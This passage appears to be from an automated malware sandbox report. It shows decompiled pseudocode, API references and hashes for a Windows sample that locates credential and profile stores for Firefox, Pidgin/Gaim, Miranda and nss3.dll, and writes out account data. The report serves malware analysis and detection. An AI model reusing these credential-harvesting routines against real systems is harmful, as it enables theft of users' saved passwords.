                                          							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                          							goto L19;
                                          						}
                                          						__eflags = _t67;
                                          						if(_t67 < 0) {
                                          							goto L19;
                                          						}
                                          						goto L18;
                                          						L19:
                                          						_v8 = _v8 + 1;
                                          						_t100 = _t100 + 0x10;
                                          						_t106 = _t106 + 0x14;
                                          						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                          					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                          					goto L20;
                                          				}
                                          				_t102 = 0;
                                          				__eflags = 0;
                                          				do {
                                          					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
                                          					0x413d74(_t72, _a4);
                                          					_v20 = _t72;
                                          					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
                                          					0x413d74(_t74, _a4);
                                          					_t107 = _t107 + 0x10;
                                          					__eflags = _v20;
                                          					if(_v20 == 0) {
                                          						L11:
                                          						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
                                          						_v16 = 1;
                                          						goto L12;
                                          					}
                                          					__eflags = _t74;
                                          					if(_t74 != 0) {
                                          						goto L12;
                                          					}
                                          					goto L11;
                                          					L12:
                                          					_v8 = _v8 + 1;
                                          					_t102 = _t102 + 0x10;
                                          					_t104 = _t104 + 0x14;
                                          					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                          				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                          				__eflags = _v16;
                                          				if(_v16 != 0) {
                                          					goto L20;
                                          				}
                                          				goto L14;
                                          			}






















                                          APIs
                                            • Part of subcall function 0040972B: ??2@YAPAXI@Z.MSVCRT ref: 0040974C
                                            • Part of subcall function 0040972B: ??3@YAXPAX@Z.MSVCRT ref: 00409813
                                          • strlen.MSVCRT ref: 0040AEA3
                                          • atoi.MSVCRT ref: 0040AEB1
                                          • _mbsicmp.MSVCRT ref: 0040AF04
                                          • _mbsicmp.MSVCRT ref: 0040AF17
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                          • String ID:
                                          • API String ID: 4107816708-0
                                          • Opcode ID: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
                                          • Instruction ID: 08bf478f3eb11018bf028c01ffb7f168253fa3ae9792e106a9a4f60ade7b3b20
                                          • Opcode Fuzzy Hash: 3a59e25db7847bfcb7a2cf7fa4c60edbf2d33e4cde8c95d2bbbe957afd87409f
                                          • Instruction Fuzzy Hash: B8414975900305EFCB11DF69D580A9ABBF4FB48308F1084BAEC15AB392D778DA51CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen
                                          • String ID: >$>$>
                                          • API String ID: 39653677-3911187716
                                          • Opcode ID: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
                                          • Instruction ID: dc7a302430b06bbc29ce8331a0d654e54ba56492e0c60a2da2e35593be10561b
                                          • Opcode Fuzzy Hash: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
                                          • Instruction Fuzzy Hash: 7B31FBA580D2C4AED7219F6880557EEFFA14F22305F1886DAC0D447383C22C9BCAD75A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 0040EA89
                                          • strlen.MSVCRT ref: 0040EA8F
                                          • strlen.MSVCRT ref: 0040EA9C
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: accounts.xml
                                          • API String ID: 581844971-666780623
                                          • Opcode ID: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
                                          • Instruction ID: 3a6749a91d87314aa81efbea2023e77c1fe97455d9ba7aea10baf3c7dddfb932
                                          • Opcode Fuzzy Hash: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
                                          • Instruction Fuzzy Hash: 9C210471A041186BCB10EB66DC416DFB7F8AF55314F0484BBE009E7142DBB8EA958FE8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 0040EB70
                                          • strlen.MSVCRT ref: 0040EB76
                                          • strlen.MSVCRT ref: 0040EB83
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: accounts.xml
                                          • API String ID: 581844971-666780623
                                          • Opcode ID: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
                                          • Instruction ID: f45e0dada1ac7c46e734b25b908a600237734d5f3cbc55dd7ef5ba4cf50aaebb
                                          • Opcode Fuzzy Hash: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
                                          • Instruction Fuzzy Hash: AD21F5719041185BDB11EB26DC41ACA77BC5F51314F0484BBA508E7141DBB8EAD68FD8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00407364(void* __eax, char* _a4, int _a8) {
                                          				void* __edi;
                                          				intOrPtr _t30;
                                          				intOrPtr _t33;
                                          				intOrPtr _t44;
                                          				intOrPtr _t52;
                                          				intOrPtr* _t54;
                                          				intOrPtr* _t55;
                                          				void* _t56;
                                          
                                          				_t56 = __eax;
                                          				if(_a8 == 0xffffffff) {
                                          					_a8 = strlen(_a4);
                                          				}
                                          				_t44 =  *((intOrPtr*)(_t56 + 4));
                                          				_t52 = _t44 + _a8 + 1;
                                          				_t30 =  *((intOrPtr*)(_t56 + 0x14));
                                          				 *((intOrPtr*)(_t56 + 4)) = _t52;
                                          				_t54 = _t56 + 0x10;
                                          				if(_t52 != 0xffffffff) {
                                          					E00406982(_t56, _t52, _t54, 1, _t30);
                                          				} else {
                                          					0x413de6( *_t54);
                                          				}
                                          				_t53 =  *(_t56 + 0x1c);
                                          				_t33 =  *((intOrPtr*)(_t56 + 0x18));
                                          				_t55 = _t56 + 0xc;
                                          				if( *(_t56 + 0x1c) != 0xffffffff) {
                                          					E00406982(_t56 + 8, _t53, _t55, 4, _t33);
                                          				} else {
                                          					0x413de6( *_t55);
                                          				}
                                          				memcpy( *((intOrPtr*)(_t56 + 0x10)) + _t44, _a4, _a8);
                                          				 *((char*)( *((intOrPtr*)(_t56 + 0x10)) + _t44 + _a8)) = 0;
                                          				 *((intOrPtr*)( *_t55 +  *(_t56 + 0x1c) * 4)) = _t44;
                                          				 *(_t56 + 0x1c) =  *(_t56 + 0x1c) + 1;
                                          				_t27 =  *(_t56 + 0x1c) - 1; // -1
                                          				return _t27;
                                          			}












                                          APIs
                                          • strlen.MSVCRT ref: 00407375
                                            • Part of subcall function 00406982: malloc.MSVCRT ref: 0040699E
                                            • Part of subcall function 00406982: memcpy.MSVCRT ref: 004069B6
                                            • Part of subcall function 00406982: ??3@YAXPAX@Z.MSVCRT ref: 004069BF
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00407398
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004073BB
                                          • memcpy.MSVCRT ref: 004073DB
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$memcpy$mallocstrlen
                                          • String ID:
                                          • API String ID: 1171893557-0
                                          • Opcode ID: 5eae7e510f03a6352586b84f7b01f0a0acff8e55822a1d9b26e8cfb98cebd805
                                          • Instruction ID: d47861f91907e87d10e443503ad883c0cefe0bd36095b640ea2ff485cde935f6
                                          • Opcode Fuzzy Hash: 5eae7e510f03a6352586b84f7b01f0a0acff8e55822a1d9b26e8cfb98cebd805
                                          • Instruction Fuzzy Hash: 53218C71204604AFD730DF18E881996B7F5EF04324B208A2EFC6A9B6D1C735FA59CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00407944(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _t21;
                                          				signed int _t23;
                                          				void* _t24;
                                          				signed int _t31;
                                          				void* _t32;
                                          				void* _t33;
                                          				void* _t44;
                                          				signed int _t46;
                                          				void* _t48;
                                          				signed int _t51;
                                          				int _t52;
                                          				void** _t53;
                                          				void* _t58;
                                          
                                          				_t53 = __esi;
                                          				_t51 = __esi[1];
                                          				_t21 = 0;
                                          				if(_t51 <= 0) {
                                          					L4:
                                          					_t33 =  *_t53;
                                          					_t23 = _t53[2] + _t51;
                                          					_t46 = 8;
                                          					_t53[1] = _t23;
                                          					_t24 = _t23 * _t46;
                                          					0x413d5c( ~(0 | _t58 > 0x00000000) | _t24, _t32);
                                          					 *_t53 = _t24;
                                          					memset(_t24, 0, _t53[1] << 3);
                                          					_t52 = _t51 << 3;
                                          					memcpy( *_t53, _t33, _t52);
                                          					if(_t33 != 0) {
                                          						0x413d56(_t33);
                                          					}
                                          					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                          					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                          				} else {
                                          					_t44 =  *__esi;
                                          					_t48 = _t44;
                                          					while( *_t48 != 0) {
                                          						_t21 = _t21 + 1;
                                          						_t48 = _t48 + 8;
                                          						_t58 = _t21 - _t51;
                                          						if(_t58 < 0) {
                                          							continue;
                                          						} else {
                                          							goto L4;
                                          						}
                                          						goto L7;
                                          					}
                                          					_t31 = _t21 << 3;
                                          					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                          					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                          				}
                                          				L7:
                                          				return 1;
                                          			}

















                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@??3@memcpymemset
                                          • String ID:
                                          • API String ID: 1865533344-0
                                          • Opcode ID: da379349a0878454dd0175aad334c0a6b10e522537b17fbd02a48e17a58ffbf9
                                          • Instruction ID: be4f301e428eab7478e357bf13cd6827c7edeb2881237a21e1a336ab79825493
                                          • Opcode Fuzzy Hash: da379349a0878454dd0175aad334c0a6b10e522537b17fbd02a48e17a58ffbf9
                                          • Instruction Fuzzy Hash: C8116DB1608601AFE329DF19D881A26F7E5FF88300F20892EE4DA87391D635E841CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040E4B6(intOrPtr _a4, char* _a8) {
                                          				intOrPtr _v8;
                                          				void _v275;
                                          				char _v276;
                                          				int _t17;
                                          				void* _t21;
                                          
                                          				_v8 = 1;
                                          				_v276 = 0;
                                          				memset( &_v275, 0, 0x104);
                                          				_t17 = strlen(_a8);
                                          				_t6 = strlen(0x41894c) + 1; // 0x1
                                          				if(_t17 + _t6 >= 0x104) {
                                          					_v276 = 0;
                                          				} else {
                                          					E00406B4B( &_v276, _a8, 0x41894c);
                                          				}
                                          				_t21 = E004069D3( &_v276);
                                          				_t38 = _t21;
                                          				if(_t21 != 0) {
                                          					_v8 = E0040E293(_t38, _a4,  &_v276);
                                          				}
                                          				return _v8;
                                          			}









                                          APIs
                                          • memset.MSVCRT ref: 0040E4DF
                                          • strlen.MSVCRT ref: 0040E4EA
                                          • strlen.MSVCRT ref: 0040E4F8
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: prefs.js
                                          • API String ID: 581844971-3783873740
                                          • Opcode ID: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
                                          • Instruction ID: 18aa10c61fb3677f8c34c5df747d0d2d010b9cd1cf1f562783039ea2ec755a14
                                          • Opcode Fuzzy Hash: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
                                          • Instruction Fuzzy Hash: 9C01C87190011CBADB11EA95EC42BCABBAC9F0531DF1008BBE604E2181E7B49B948794
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E0040D4E9(void* __eax) {
                                          				void _v267;
                                          				char _v268;
                                          				int _t12;
                                          				char _t16;
                                          				char* _t27;
                                          
                                          				_t27 = __eax + 0x20a;
                                          				 *_t27 = 0;
                                          				_v268 = 0;
                                          				memset( &_v267, 0, 0x104);
                                          				0x41223f(0x1a);
                                          				_t12 = strlen("Mozilla\Profiles");
                                          				_t6 = strlen( &_v268) + 1; // 0x1
                                          				if(_t12 + _t6 >= 0x104) {
                                          					 *_t27 = 0;
                                          				} else {
                                          					E00406B4B(_t27,  &_v268, "Mozilla\Profiles");
                                          				}
                                          				_t16 = E004069D3(_t27);
                                          				if(_t16 == 0) {
                                          					 *_t27 = _t16;
                                          					return _t16;
                                          				}
                                          				return _t16;
                                          			}









                                          APIs
                                          • memset.MSVCRT ref: 0040D516
                                          • strlen.MSVCRT ref: 0040D52E
                                          • strlen.MSVCRT ref: 0040D53C
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: Mozilla\Profiles
                                          • API String ID: 581844971-2796945589
                                          • Opcode ID: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
                                          • Instruction ID: 3c6ae931ffe100bc814a6c4c739c4374e257fa1fb59e82d364b3a540d615c615
                                          • Opcode Fuzzy Hash: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
                                          • Instruction Fuzzy Hash: 2201F07290821466D711A6699C42FCA779C4F21759F2404BBF5C5F31C2EDB899C443A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E0040D578(void* __eax) {
                                          				void _v267;
                                          				char _v268;
                                          				int _t12;
                                          				char _t16;
                                          				char* _t27;
                                          
                                          				_t27 = __eax + 0x61e;
                                          				 *_t27 = 0;
                                          				_v268 = 0;
                                          				memset( &_v267, 0, 0x104);
                                          				0x41223f(0x1a);
                                          				_t12 = strlen(".purple");
                                          				_t6 = strlen( &_v268) + 1; // 0x1
                                          				if(_t12 + _t6 >= 0x104) {
                                          					 *_t27 = 0;
                                          				} else {
                                          					E00406B4B(_t27,  &_v268, ".purple");
                                          				}
                                          				_t16 = E004069D3(_t27);
                                          				if(_t16 == 0) {
                                          					 *_t27 = _t16;
                                          					return _t16;
                                          				}
                                          				return _t16;
                                          			}









                                          APIs
                                          • memset.MSVCRT ref: 0040D5A5
                                          • strlen.MSVCRT ref: 0040D5BD
                                          • strlen.MSVCRT ref: 0040D5CB
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: .purple
                                          • API String ID: 581844971-1504268026
                                          • Opcode ID: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
                                          • Instruction ID: 5dc147b8957afa7b06b9bacfad0a4e1db4396cb0d3e541dfcccdd27de6d8d665
                                          • Opcode Fuzzy Hash: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
                                          • Instruction Fuzzy Hash: 8C0120725081146AD711A669DC42BCA779C4F21709F2404BFF5C5F71C2FEB899C543AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E0040D607(void* __eax) {
                                          				void _v267;
                                          				char _v268;
                                          				int _t12;
                                          				char _t16;
                                          				char* _t27;
                                          
                                          				_t27 = __eax + 0x30f;
                                          				 *_t27 = 0;
                                          				_v268 = 0;
                                          				memset( &_v267, 0, 0x104);
                                          				0x41223f(0x1a);
                                          				_t12 = strlen(".gaim");
                                          				_t6 = strlen( &_v268) + 1; // 0x1
                                          				if(_t12 + _t6 >= 0x104) {
                                          					 *_t27 = 0;
                                          				} else {
                                          					E00406B4B(_t27,  &_v268, ".gaim");
                                          				}
                                          				_t16 = E004069D3(_t27);
                                          				if(_t16 == 0) {
                                          					 *_t27 = _t16;
                                          					return _t16;
                                          				}
                                          				return _t16;
                                          			}









                                          APIs
                                          • memset.MSVCRT ref: 0040D634
                                          • strlen.MSVCRT ref: 0040D64C
                                          • strlen.MSVCRT ref: 0040D65A
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: .gaim
                                          • API String ID: 581844971-3490432478
                                          • Opcode ID: adcac243f634cd9f4ba49c533a924e47bd2570a5673518b618adaff46f672105
                                          • Instruction ID: a115bc8fa66553d394cd4cab83c679d7ef9605289ec37c5517f9616187ac7207
                                          • Opcode Fuzzy Hash: adcac243f634cd9f4ba49c533a924e47bd2570a5673518b618adaff46f672105
                                          • Instruction Fuzzy Hash: 540120729082546AD721A6699C42BCB779C4F21709F2008BFF5C8F31C2EEBC5AC543A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E0040D696(void* __eax) {
                                          				void _v267;
                                          				char _v268;
                                          				int _t12;
                                          				char _t16;
                                          				char* _t27;
                                          
                                          				_t27 = __eax + 0x414;
                                          				 *_t27 = 0;
                                          				_v268 = 0;
                                          				memset( &_v267, 0, 0x104);
                                          				0x41223f(0x1a);
                                          				_t12 = strlen("Miranda");
                                          				_t6 = strlen( &_v268) + 1; // 0x1
                                          				if(_t12 + _t6 >= 0x104) {
                                          					 *_t27 = 0;
                                          				} else {
                                          					E00406B4B(_t27,  &_v268, "Miranda");
                                          				}
                                          				_t16 = E004069D3(_t27);
                                          				if(_t16 == 0) {
                                          					 *_t27 = _t16;
                                          					return _t16;
                                          				}
                                          				return _t16;
                                          			}









                                          APIs
                                          • memset.MSVCRT ref: 0040D6C3
                                          • strlen.MSVCRT ref: 0040D6DB
                                          • strlen.MSVCRT ref: 0040D6E9
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: Miranda
                                          • API String ID: 581844971-4004425691
                                          • Opcode ID: a1f73f7abb57728e4712774607e4362808b5bed289a3dcc15fc17451e6932546
                                          • Instruction ID: c142bb7588fded06bca0c3959130fc7bc280b220a29219a6f5312b9b0058b910
                                          • Opcode Fuzzy Hash: a1f73f7abb57728e4712774607e4362808b5bed289a3dcc15fc17451e6932546
                                          • Instruction Fuzzy Hash: 180120769081146AD721BA699C42BDA779C4F21709F2404BBF5C4F31C2EEB859C543BD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy
                                          • String ID:
                                          • API String ID: 714388716-0
                                          • Opcode ID: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
                                          • Instruction ID: dce8e19ef7dbf3e453dc58d21b67a2b53133f69bc0796553bf20bccd0e5dc17f
                                          • Opcode Fuzzy Hash: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
                                          • Instruction Fuzzy Hash: 310144769002089BCB22EBA5DC85EDB77BCAF88305F0004ABF54797141EF38A7C48B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			E0040B15B(void* __esi) {
                                          				void* _v260;
                                          				char _v516;
                                          				void* __ebx;
                                          				long _t16;
                                          				signed short _t24;
                                          				signed short _t26;
                                          				void* _t27;
                                          
                                          				_t27 = __esi;
                                          				_push(E00409445( *((intOrPtr*)(__esi + 0x390))));
                                          				_t24 = 4;
                                          				sprintf( &_v260, E0040876F(_t24));
                                          				_t16 = E004099DC( *((intOrPtr*)(__esi + 0x390)), 0);
                                          				if(_t16 > 0) {
                                          					_t26 = 5;
                                          					sprintf( &_v516, E0040876F(_t26));
                                          					_t16 =  &_v260;
                                          					0x413cf4(_t16,  &_v516, _t16);
                                          				}
                                          				if( *((intOrPtr*)(_t27 + 0x108)) != 0) {
                                          					return SendMessageA( *(_t27 + 0x114), 0x401, 0,  &_v260);
                                          				}
                                          				return _t16;
                                          			}











                                          APIs
                                            • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                            • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                          • sprintf.MSVCRT ref: 0040B181
                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B1E4
                                            • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                            • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                          • sprintf.MSVCRT ref: 0040B1AB
                                          • _mbscat.MSVCRT ref: 0040B1BE
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                          • String ID:
                                          • API String ID: 203655857-0
                                          • Opcode ID: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
                                          • Instruction ID: ecab945e31bd422c391273073b57af520698e657e98585e8788b6dab187b6cf3
                                          • Opcode Fuzzy Hash: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
                                          • Instruction Fuzzy Hash: 0E0167B25003046AD721B775DC86FEB73AC6B04704F14046FB655B6182EA79EA848A68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E00405E4A(char* _a4) {
                                          				void _v267;
                                          				char _v268;
                                          				int _t12;
                                          				signed int _t16;
                                          
                                          				_v268 = 0;
                                          				memset( &_v267, 0, 0x104);
                                          				_t12 = strlen(_a4);
                                          				_t5 = strlen(0x418198) + 1; // 0x1
                                          				if(_t12 + _t5 >= 0x104) {
                                          					_v268 = 0;
                                          				} else {
                                          					E00406B4B( &_v268, _a4, 0x418198);
                                          				}
                                          				_t16 = E004069D3( &_v268);
                                          				asm("sbb eax, eax");
                                          				return  ~( ~_t16);
                                          			}








                                          APIs
                                          • memset.MSVCRT ref: 00405E6C
                                          • strlen.MSVCRT ref: 00405E74
                                          • strlen.MSVCRT ref: 00405E81
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: nss3.dll
                                          • API String ID: 581844971-2492180550
                                          • Opcode ID: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
                                          • Instruction ID: 0509c7bfbc4d162460136cac1117631891986418d94c1b22c83112455de3b5d3
                                          • Opcode Fuzzy Hash: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
                                          • Instruction Fuzzy Hash: 44F0CD7140C1186BDB10E769DC45FDA7BAC8F61719F1000B7F589E60C1DAB8ABC546A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E0040A6B4(intOrPtr* __ecx, intOrPtr _a4) {
                                          				void _v259;
                                          				char _v260;
                                          				void _v515;
                                          				char _v516;
                                          				void* __esi;
                                          				void* _t15;
                                          				intOrPtr* _t24;
                                          				char* _t26;
                                          
                                          				_t24 = __ecx;
                                          				_v260 = 0;
                                          				memset( &_v259, 0, 0xfe);
                                          				_v516 = 0;
                                          				memset( &_v515, 0, 0xfe);
                                          				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
                                          				_t26 =  &_v260;
                                          				E00409DD6(_t26, _t15);
                                          				_push(_t26);
                                          				sprintf( &_v516, "</%s>");
                                          				return E004067EC(_a4,  &_v516);
                                          			}












                                          APIs
                                          • memset.MSVCRT ref: 0040A6D7
                                          • memset.MSVCRT ref: 0040A6ED
                                            • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                            • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                          • sprintf.MSVCRT ref: 0040A717
                                            • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                            • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                          • String ID: </%s>
                                          • API String ID: 3699762281-259020660
                                          • Opcode ID: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
                                          • Instruction ID: 76c63a3487c2ea4e5ea40729799977580a4d7530bed5194a5a383ad1b54ece87
                                          • Opcode Fuzzy Hash: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
                                          • Instruction Fuzzy Hash: EB01F97290012977D720A719CC46FDE7B6CAF55705F0400FAB50DF3142EA749B848BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040783B(void* __eax, void* __eflags) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				int _t10;
                                          				int _t11;
                                          				char* _t13;
                                          				char* _t18;
                                          				void* _t19;
                                          				void* _t23;
                                          
                                          				_t19 = __eax;
                                          				E00407930(__eax);
                                          				_t1 = _t23 + 0x14; // 0x4042e3
                                          				_t2 = _t19 + 0x3cc; // 0x4cb
                                          				_t18 = _t2;
                                          				E00406958(0x143, _t18,  *_t1);
                                          				 *((intOrPtr*)(_t23 + 0x1c)) = _t19 + 4;
                                          				_t10 = strlen(_t18);
                                          				_t11 = strlen(0x417f90);
                                          				_t13 =  *((intOrPtr*)(_t23 + 0x20));
                                          				if(_t11 + _t10 + 1 >= 0x143) {
                                          					 *_t13 = 0;
                                          					return _t13;
                                          				}
                                          				return E00406B4B(_t13, _t18, 0x417f90);
                                          			}













                                          APIs
                                            • Part of subcall function 00407930: FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                            • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                            • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                          • strlen.MSVCRT ref: 00407862
                                          • strlen.MSVCRT ref: 0040786F
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$CloseFind_mbscat_mbscpymemcpy
                                          • String ID: *.*$B@
                                          • API String ID: 470300861-2086290067
                                          • Opcode ID: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                          • Instruction ID: 1d68107b6d1fc83258085f2e46244374cde2cc5f318db11bb1f65da7a858b60d
                                          • Opcode Fuzzy Hash: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
